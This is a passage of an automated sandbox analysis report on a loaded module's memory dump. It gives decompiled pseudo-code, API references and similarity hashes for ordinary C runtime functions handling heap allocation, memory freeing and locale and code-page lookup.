					E6EDB1340(_v24);
					_t49 = _t49 + 4;
					E6EDB26D0(_v32, _v28,  *((intOrPtr*)(_v24 + 0x14)) + 1); // executed
				}
				 *((intOrPtr*)(_v24 + 0x10)) = 0;
				 *((intOrPtr*)(_v24 + 0x14)) = 0xf;
				_v17 = 0;
				_t26 = E6EDB25A0(0 + _v24,  &_v17);
				 *[fs:0x0] = _v16;
				return _t26;
			}

0x6edb23a3
0x6edb23a5
0x6edb23b0
0x6edb23b1
0x6edb23b8
0x6edb23bb
0x6edb23c1
0x6edb23d3
0x6edb23da
0x6edb23e5
0x6edb23eb
0x6edb23ec
0x6edb23f1
0x6edb2405
0x6edb2405
0x6edb240d
0x6edb2417
0x6edb241e
0x6edb2432
0x6edb243d
0x6edb2447

APIs

allocator.LIBCONCRTD ref: 6EDB2405

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: allocator
String ID:
API String ID: 3447690668-0
Opcode ID: 011d305c28b58042645ee62b660e219c0e125813ab123e776b525b423f8ab133
Instruction ID: 5f647de32cfd2577b111a0f91e37baad5be30dabfabc696b2aed759e124b3eaa
Opcode Fuzzy Hash: 011d305c28b58042645ee62b660e219c0e125813ab123e776b525b423f8ab133
Instruction Fuzzy Hash: 981130B5D0010A9BDB04DFD4D951BBFB7B9EB44308F204568D506AB781EB35AA01CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB2A90, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDB2A90(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				intOrPtr _t25;
				char* _t29;
				char* _t30;
				intOrPtr _t39;
				void* _t45;

				_v8 = __ecx;
				_v16 = E6EE3ACED(__ecx, _t45);
				if(_a8 <=  *((intOrPtr*)(_v8 + 4)) -  *_v8) {
					_t25 = E6EDB1920( &_v40, __eflags,  *((intOrPtr*)(_v8 + 8)) +  *_v8, _a8); // executed
					_v12 = _t25;
					E6EDB1E70(_a4, _v12);
					E6EDB1D80( &_v40);
					_t39 =  *_v8 + _a8;
					__eflags = _t39;
					 *_v8 = _t39;
					_t29 = _a12;
					 *_t29 = 1;
					return _t29;
				}
				_t30 = _a12;
				 *_t30 = 0;
				return _t30;
			}

0x6edb2a96
0x6edb2a9e
0x6edb2aaf
0x6edb2acc
0x6edb2ad1
0x6edb2adb
0x6edb2ae3
0x6edb2aed
0x6edb2aed
0x6edb2af3
0x6edb2af5
0x6edb2af8
0x00000000
0x6edb2af8
0x6edb2ab1
0x6edb2ab4
0x00000000

APIs

task.LIBCPMTD ref: 6EDB2AE3

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: cfa3e00e6516195de070d8b3fbfa6c58c4495ab571f1e9cecdc6b197ad80c6fd
Instruction ID: 2a0fd5927d3e1313dff006a9a082c715371491a117c198aff6aad126fd6db25c
Opcode Fuzzy Hash: cfa3e00e6516195de070d8b3fbfa6c58c4495ab571f1e9cecdc6b197ad80c6fd
Instruction Fuzzy Hash: A311C575A00248EFCB04CFA8C9909DDB7B5BF49304F208599E8169B350D731AE40DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EE447A4, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EE447A4(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6ee796a4, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6EE4ECA6();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6EE42012(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E6EE42BF8(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x6ee447aa
0x6ee447af
0x6ee447bd
0x6ee447bd
0x6ee447c3
0x6ee447c5
0x6ee447c5
0x6ee447dc
0x6ee447e5
0x6ee447ed
0x00000000
0x00000000
0x6ee447cd
0x6ee447cf
0x6ee447f1
0x6ee447f6
0x6ee447fc
0x00000000
0x6ee447fc
0x6ee447d8
0x6ee447da
0x00000000
0x00000000
0x6ee447da
0x00000000
0x6ee447dc
0x6ee447b5
0x6ee447bb
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6EE4466C,00000001,00000364,00000006,000000FF,?,00000000,?,6EE42017,6EE44799), ref: 6EE447E5

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3450e466e2650fa89d2e0fb627b040c2ed44daafd17815e8ad31cd5fb186dd1c
Instruction ID: 2e61b8c5ac524826fb45aef82c5964b3e7816a52555515aa0035c78438bcf198
Opcode Fuzzy Hash: 3450e466e2650fa89d2e0fb627b040c2ed44daafd17815e8ad31cd5fb186dd1c
Instruction Fuzzy Hash: 95F0BB32355626DEEB515EE6BC48E46378CDF437A4F314113E814EB584CF21D90385A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EE36113, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E6EE36113(void* __eflags, intOrPtr _a4) {
				intOrPtr _v16;
				char _v20;
				intOrPtr _v28;
				void* _t11;
				void* _t12;
				void* _t17;
				char* _t23;
				void* _t26;
				void* _t27;
				void* _t29;

				while(1) {
					_push(_a4);
					_t11 = E6EE3ACE2(); // executed
					if(_t11 != 0) {
						break;
					}
					_t12 = E6EE42BF8(__eflags, _a4);
					__eflags = _t12;
					if(_t12 == 0) {
						__eflags = _a4 - 0xffffffff;
						if(_a4 != 0xffffffff) {
							_push(_t26);
							_t26 = _t29;
							_t29 = _t29 - 0xc;
							E6EE34367( &_v20);
							E6EE37B80( &_v20, 0x6ee684dc);
							asm("int3");
						}
						_push(_t26);
						_t27 = _t29;
						_t23 =  &_v20;
						E6EDB1C40(_t23);
						E6EE37B80( &_v20, 0x6ee67e9c);
						asm("int3");
						_push(_t27);
						_push(_t23);
						_v28 = 0;
						_t17 = E6EE4471C(_v16); // executed
						return _t17;
					} else {
						continue;
					}
					L10:
				}
				return _t11;
				goto L10;
			}

0x6ee36125
0x6ee36125
0x6ee36128
0x6ee36130
0x00000000
0x00000000
0x6ee3611b
0x6ee36121
0x6ee36123
0x6ee36134
0x6ee36138
0x6ee3708c
0x6ee3708d
0x6ee3708f
0x6ee37095
0x6ee370a3
0x6ee370a8
0x6ee370a8
0x6ee370a9
0x6ee370aa
0x6ee370af
0x6ee370b2
0x6ee370c0
0x6ee370c5
0x6ee3acc9
0x6ee3accc
0x6ee3acd0
0x6ee3acda
0x6ee3ace1
0x00000000
0x00000000
0x00000000
0x00000000
0x6ee36123
0x6ee36133
0x00000000

APIs

stdext::threads::lock_error::lock_error.LIBCPMTD ref: 6EE370B2

Part of subcall function 6EE37B80: RaiseException.KERNEL32(E06D7363,00000001,00000003,6EE370C5,?,?,?,6EE370C5,?,6EE67E9C), ref: 6EE37BE0

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaisestdext::threads::lock_error::lock_error
String ID:
API String ID: 3447279179-0
Opcode ID: 3866569f8b3ab5c49d951893f101dea9808b76ccf84cf40566091cd88468e8fb
Instruction ID: 9e77d970155ed349fb4668a859a92d99800ae867dbd049c8f38c1ac2a0d20e7c
Opcode Fuzzy Hash: 3866569f8b3ab5c49d951893f101dea9808b76ccf84cf40566091cd88468e8fb
Instruction Fuzzy Hash: 54F0B47084021FBBCB04ABF9EC649EE777C5900258F704628A828961D1FF70D659C5D0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB1390, Relevance: 1.5, APIs: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6EDB1390(void* __ebx, void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __ebp;
				intOrPtr _t16;
				void* _t23;
				void* _t31;

				_t31 = __edi;
				_t23 = __ebx;
				_v12 = _a4 + 0x23;
				_t24 = _v12;
				if(_v12 <= _a4) {
					E6EDB2380();
				}
				_t26 = _v12;
				_t16 = E6EDB2110(_v12); // executed
				_v8 = _t16;
				do {
					if(_v8 == 0) {
						do {
							E6EE3AC76(_t23, _t24, _t26, _t31, __eflags);
							__eflags = 0;
						} while (0 != 0);
					} else {
					}
					_t24 = 0;
				} while (0 != 0);
				_v16 = _v8 + 0x00000023 & 0xffffffe0;
				 *((intOrPtr*)(_v16 + 0xfffffffffffffffc)) = _v8;
				return _v16;
			}

0x6edb1390
0x6edb1390
0x6edb139c
0x6edb139f
0x6edb13a5
0x6edb13a7
0x6edb13a7
0x6edb13ac
0x6edb13b0
0x6edb13b8
0x6edb13bb
0x6edb13bf
0x6edb13c3
0x6edb13c3
0x6edb13c8
0x6edb13c8
0x00000000
0x6edb13c1
0x6edb13cc
0x6edb13cc
0x6edb13d9
0x6edb13ea
0x6edb13f3

APIs

Concurrency::cancel_current_task.LIBCPMTD ref: 6EDB13A7

Part of subcall function 6EDB2380: stdext::threads::lock_error::lock_error.LIBCPMTD ref: 6EDB2389

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::cancel_current_taskstdext::threads::lock_error::lock_error
String ID:
API String ID: 2103942186-0
Opcode ID: c2f46a631e376d9ab501e16b11ecc234a5f6b27116b92b75c6625e3be690b817
Instruction ID: 41752e8f61ab5195cab75d4c593e2c6aa8710acecf2ea65eb59f7c06b500a39d
Opcode Fuzzy Hash: c2f46a631e376d9ab501e16b11ecc234a5f6b27116b92b75c6625e3be690b817
Instruction Fuzzy Hash: 03F03CB4D04108EBCB44DFE8D581A9DB7B5AF44308F1081A9D8169B788F7309A44CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6EE44756, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EE44756(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6EE42012(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6ee796a4, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6EE4ECA6();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E6EE42BF8(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x6ee4475c
0x6ee44762
0x6ee44794
0x6ee44799
0x6ee4479f
0x00000000
0x6ee4479f
0x6ee44766
0x6ee44768
0x6ee44768
0x6ee4477f
0x6ee44788
0x6ee44790
0x00000000
0x00000000
0x6ee44770
0x6ee44772
0x00000000
0x00000000
0x6ee4477b
0x6ee4477d
0x00000000
0x00000000
0x6ee4477d
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?,?,6EE3612D,00000000,?,6EDB211C,00000000,?,6EDB1379,00000000), ref: 6EE44788

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1f8d8b2d3dcaa43327d27f0523db63b09464678bb8b99aae3a878dd6391a4f58
Instruction ID: 546feecf5d2ba4af64f636a7f46ceb5e3973381a023e15f0c47eb5801d8075f1
Opcode Fuzzy Hash: 1f8d8b2d3dcaa43327d27f0523db63b09464678bb8b99aae3a878dd6391a4f58
Instruction Fuzzy Hash: 72E0E531394622DAFB511EE57C08F86368C9F532B8F310122EC54D72C0CB61DA0381E0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB1ED0, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDB1ED0(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v36;
				intOrPtr _t10;

				_v8 = __ecx;
				_t10 = E6EDB2870(_v8, __edx, __eflags,  &_v36); // executed
				_v12 = _t10;
				E6EDB1E70(_a4, _v12);
				E6EDB1D80( &_v36);
				return _v8;
			}

0x6edb1ed6
0x6edb1ee0
0x6edb1ee5
0x6edb1eef
0x6edb1ef7
0x6edb1f02

APIs

Part of subcall function 6EDB2870: task.LIBCPMTD ref: 6EDB2904
Part of subcall function 6EDB2870: task.LIBCPMTD ref: 6EDB2913

task.LIBCPMTD ref: 6EDB1EF7

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: 742e398ef474c4288a5d5449e1c5913801b3e3beac6dc4b3ac387022e504948f
Instruction ID: 630b28f6aca4c5eae4c5899f11aa2e87e1d14ef52b987d25d28c45dc290d6ccd
Opcode Fuzzy Hash: 742e398ef474c4288a5d5449e1c5913801b3e3beac6dc4b3ac387022e504948f
Instruction Fuzzy Hash: F1E0B6B6D1010CAB8B08EFD4D9918EEB7BDAB48244F1045A9D906A7250EB306E54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EE3ACC7, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EE3ACC7(intOrPtr _a4) {
				intOrPtr _v8;
				void* _t5;

				_v8 = 0;
				_t5 = E6EE4471C(_a4); // executed
				return _t5;
			}

0x6ee3acd0
0x6ee3acda
0x6ee3ace1

APIs

_free.LIBCMT ref: 6EE3ACDA

Part of subcall function 6EE4471C: RtlFreeHeap.NTDLL(00000000,00000000,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?), ref: 6EE44732
Part of subcall function 6EE4471C: GetLastError.KERNEL32(?,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?,?), ref: 6EE44744

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: b8491873f685e2eebcaa77a187cc3c060f0ab51aab52a7b8d1808a0a4185cf5c
Instruction ID: 69f55c038f5935bde86185dc389db0d45f4543cf7a50d7579b768230b30f0d3a
Opcode Fuzzy Hash: b8491873f685e2eebcaa77a187cc3c060f0ab51aab52a7b8d1808a0a4185cf5c
Instruction Fuzzy Hash: 46C04C71500208FBDB059FC5D94AA8E7FA9DB81268F244059E41557250DBB1EF459690

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCC400, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E6EDCC400(intOrPtr __ecx) {
				intOrPtr _v8;
				void* _t3;

				_push(__ecx);
				_v8 = __ecx;
				_t3 = E6EDB1D80(_v8 + 4); // executed
				return _t3;
			}

0x6edcc403
0x6edcc404
0x6edcc40d
0x6edcc415

APIs

task.LIBCPMTD ref: 6EDCC40D

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: 2bb5da8eb9042f291cca8bfa43adc8a5ecdb0c584f3f36ed0e02f8904114d9e4
Instruction ID: f1a97578bdef47d31295550fbe1d0d36d98855fa5d266af33fbd35787f3eb17a
Opcode Fuzzy Hash: 2bb5da8eb9042f291cca8bfa43adc8a5ecdb0c584f3f36ed0e02f8904114d9e4
Instruction Fuzzy Hash: 63C09B7091910CA75708DFC9E91156DB76CDA45258B1405DDE90E53301D9316E1055E9

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCC3E0, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E6EDCC3E0(intOrPtr __ecx) {
				intOrPtr _v8;
				void* _t3;

				_push(__ecx);
				_v8 = __ecx;
				_t3 = E6EDCC2A0(_v8); // executed
				return _t3;
			}

0x6edcc3e3
0x6edcc3e4
0x6edcc3ea
0x6edcc3f2

APIs

Concurrency::details::VirtualProcessorRoot::Subscribe.LIBCONCRTD ref: 6EDCC3EA

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::ProcessorRoot::SubscribeVirtual
String ID:
API String ID: 3722791471-0
Opcode ID: c7ac7c9fdecbd0e746a0e778ef1f86efbfaced9f3d47a53356e5ae8c7ce2979b
Instruction ID: 56fa07dc647ddd962c2283bbaf05fe6b2dcd31e6c8ec8e2582cf7176dcdc18aa
Opcode Fuzzy Hash: c7ac7c9fdecbd0e746a0e778ef1f86efbfaced9f3d47a53356e5ae8c7ce2979b
Instruction Fuzzy Hash: FAB09B7091910CB74704DBC5E90145DF76CD685754B5001DDA90D573009A311E1095D5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6EE51EAD, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6EE51EAD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t69;
				void* _t73;
				void* _t74;
				void* _t78;
				intOrPtr* _t85;
				short* _t87;
				intOrPtr* _t92;
				intOrPtr* _t96;
				signed int _t114;
				void* _t115;
				intOrPtr* _t117;
				intOrPtr _t120;
				signed int* _t121;
				intOrPtr* _t124;
				signed short _t126;
				int _t128;
				void* _t132;
				signed int _t133;

				_t162 = __fp0;
				_push(__ecx);
				_push(__ecx);
				_t85 = _a4;
				_push(__esi);
				_push(__edi);
				_t33 = E6EE444CA(__ecx, __edx, __fp0);
				_t114 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t124 = _t3;
				_t4 = _t124 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t124 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t124 + 4; // 0x54
				_t117 = _t6;
				_v8 = _t34;
				_t92 = _t85;
				_t35 = _t85 + 0x80;
				 *_t124 = _t85;
				 *_t117 = _t35;
				if( *_t35 != 0) {
					E6EE51E40(0x6ee62400, 0x16, _t117);
					_t92 =  *_t124;
					_t132 = _t132 + 0xc;
					_t114 = 0;
				}
				_push(_t124);
				if( *_t92 == _t114) {
					E6EE517B1(_t92);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t117)) == _t114) {
						E6EE518D1();
					} else {
						E6EE51838(_t92);
					}
					if( *((intOrPtr*)(_t124 + 8)) == 0) {
						_t78 = E6EE51E40(0x6ee620f0, 0x40, _t124);
						_t132 = _t132 + 0xc;
						if(_t78 != 0) {
							_push(_t124);
							if( *((intOrPtr*)( *_t117)) == 0) {
								E6EE518D1();
							} else {
								E6EE51838(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t124 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t85 + 0x100;
					if( *_t85 != 0 ||  *_t38 != 0) {
						_t39 = E6EE51CFD(_t162, _t38, _t124);
					} else {
						_t39 = GetACP();
					}
					_t126 = _t39;
					if(_t126 == 0 || _t126 == 0xfde8 || IsValidCodePage(_t126 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t126;
						}
						_t120 = _a12;
						if(_t120 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t96 = _v8;
							_t15 = _t120 + 0x120; // 0xd0
							_t87 = _t15;
							 *_t87 = 0;
							_t16 = _t96 + 2; // 0x6
							_t115 = _t16;
							do {
								_t45 =  *_t96;
								_t96 = _t96 + 2;
							} while (_t45 != _v12);
							_t18 = (_t96 - _t115 >> 1) + 1; // 0x3
							_t47 = E6EE516FF(_t87, 0x55, _v8);
							_t133 = _t132 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6EE3AC93();
								asm("int3");
								_t131 = _t133;
								_t50 =  *0x6ee77a68; // 0xa89efc87
								_v52 = _t50 ^ _t133;
								_push(_t87);
								_push(_t126);
								_push(_t120);
								_t52 = E6EE444CA(_t98, _t115, _t162);
								_t88 = _t52;
								_t121 =  *(E6EE444CA(_t98, _t115, _t162) + 0x34c);
								_t128 = E6EE525E8(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t128, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E6EE4D365(_t121, _t128, _t162,  *((intOrPtr*)(_t88 + 0x54)),  &_v252) == 0 && E6EE5271A(_t128) != 0) {
										 *_t121 =  *_t121 | 0x00000004;
										_t121[2] = _t128;
										_t121[1] = _t128;
									}
								} else {
									 *_t121 =  *_t121 & _t56;
								}
								return E6EE361A7(_v12 ^ _t131);
							} else {
								if(E6EE44DE4(_t87, 0x1001, _t120, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t120 + 0x80; // 0x30
									_t87 = _t20;
									_t21 = _t120 + 0x120; // 0xd0
									if(E6EE44DE4(_t21, 0x1002, _t87, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t69 = E6EE55ECB(_t98);
										_t98 = _t87;
										if(_t69 != 0) {
											L31:
											_t22 = _t120 + 0x120; // 0xd0
											if(E6EE44DE4(_t22, 7, _t87, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t74 = E6EE55ECB(_t98);
											_t98 = _t87;
											if(_t74 == 0) {
												L32:
												_t120 = _t120 + 0x100;
												if(_t126 != 0xfde9) {
													E6EE484EA(_t98, _t126, _t120, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t73 = E6EE516FF(_t120, 0x10, L"utf8");
													_t133 = _t133 + 0x10;
													if(_t73 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

APIs

Part of subcall function 6EE444CA: GetLastError.KERNEL32(?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?,?,6EDB28E8,?), ref: 6EE444CF
Part of subcall function 6EE444CA: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?), ref: 6EE4456D

GetACP.KERNEL32(?,?,?,?,?,?,6EE46D32,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6EE51F6E
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6EE46D32,?,?,?,00000055,?,-00000050,?,?), ref: 6EE51F99
_wcschr.LIBVCRUNTIME ref: 6EE5202D
_wcschr.LIBVCRUNTIME ref: 6EE5203B
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6EE520FC

Strings

utf8, xrefs: 6EE5206B

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: c94fed16703b2926c1555769c454b9ec02277a1b74b51270b77ac62374d62368
Instruction ID: 1b3019da88f86dfabc431b2df52a3b590d09e2ddd0fef8944f12d7e19cf77a87
Opcode Fuzzy Hash: c94fed16703b2926c1555769c454b9ec02277a1b74b51270b77ac62374d62368
